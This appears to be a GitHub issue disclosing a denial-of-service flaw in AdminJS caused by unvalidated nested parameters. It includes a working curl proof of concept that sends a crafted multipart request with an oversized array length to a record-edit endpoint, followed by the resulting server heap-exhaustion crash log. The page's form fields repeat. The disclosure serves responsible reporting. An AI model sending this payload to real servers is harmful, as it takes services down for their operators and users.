Open nostalgiaz opened 1 month ago
No response
This is a vulnerability that stems from a lack of validation of the nested parameters.
How to reproduce:
git clone git@github.com:nostalgiaz/adminjs-ddos.git
cd adminjs-ddos
npm i
docker-compose up -d
DATABASE_URL=postgresql://dbtest:dbtest@localhost:5442/dbtest?schema=public npm run migrate
DATABASE_URL=postgresql://dbtest:dbtest@localhost:5442/dbtest?schema=public npm run dev
curl http://localhost:8080/set-up
connect.sid
curl
curl --path-as-is -i -s -k -X $'POST' \ -H $'Host: localhost:8080' \ -b $'connect.sid={COOKIE}' \ -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBbtRxb7caACJwTiZ' -H $'Content-Length: 270' \ --data-binary $'------WebKitFormBoundaryBbtRxb7caACJwTiZ\x0d\x0aContent-Disposition: form-data; name=\"previewData.rows.0.0\"\x0d\x0a\x0d\x0ax\x0d\x0a------WebKitFormBoundaryBbtRxb7caACJwTiZ\x0d\x0aContent-Disposition: form-data; name=\"previewData.rows.0.length\"\x0d\x0a\x0d\x0a99999999\x0d\x0a------WebKitFormBoundaryBbtRxb7caACJwTiZ\x0d\x0a' \ $'http://localhost:8080/admin/api/resources/TestModel/records/1/edit'
Check the server shell: this is what I get.
<--- Last few GCs ---> [25778:0x158008000] 64915 ms: Scavenge 3898.2 (3976.8) -> 3895.0 (3982.6) MB, 15.92 / 0.00 ms (average mu = 0.385, current mu = 0.281) allocation failure; [25778:0x158008000] 72272 ms: Mark-Compact 4477.8 (4556.4) -> 4091.3 (4185.1) MB, 6399.42 / 0.00 ms (average mu = 0.251, current mu = 0.172) allocation failure; scavenge might not succeed <--- JS stacktrace ---> FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory ----- Native stack trace -----
Demo repo: https://github.com/nostalgiaz/adminjs-ddos
On specific a request
Firefox, Chrome, Safari, Microsoft Edge
Contact Details
No response
What happened?
This is a vulnerability that stems from a lack of validation of the nested parameters.
How to reproduce:
git clone git@github.com:nostalgiaz/adminjs-ddos.gitcd adminjs-ddosnpm idocker-compose up -dDATABASE_URL=postgresql://dbtest:dbtest@localhost:5442/dbtest?schema=public npm run migrateDATABASE_URL=postgresql://dbtest:dbtest@localhost:5442/dbtest?schema=public npm run devcurl http://localhost:8080/set-upconnect.sidcookie in the followingcurl:Check the server shell: this is what I get.
Demo repo: https://github.com/nostalgiaz/adminjs-ddos
Bug prevalence
On specific a request
AdminJS dependencies version
What browsers do you see the problem on?
Firefox, Chrome, Safari, Microsoft Edge
Relevant log output
No response
Relevant code that's giving you issues
No response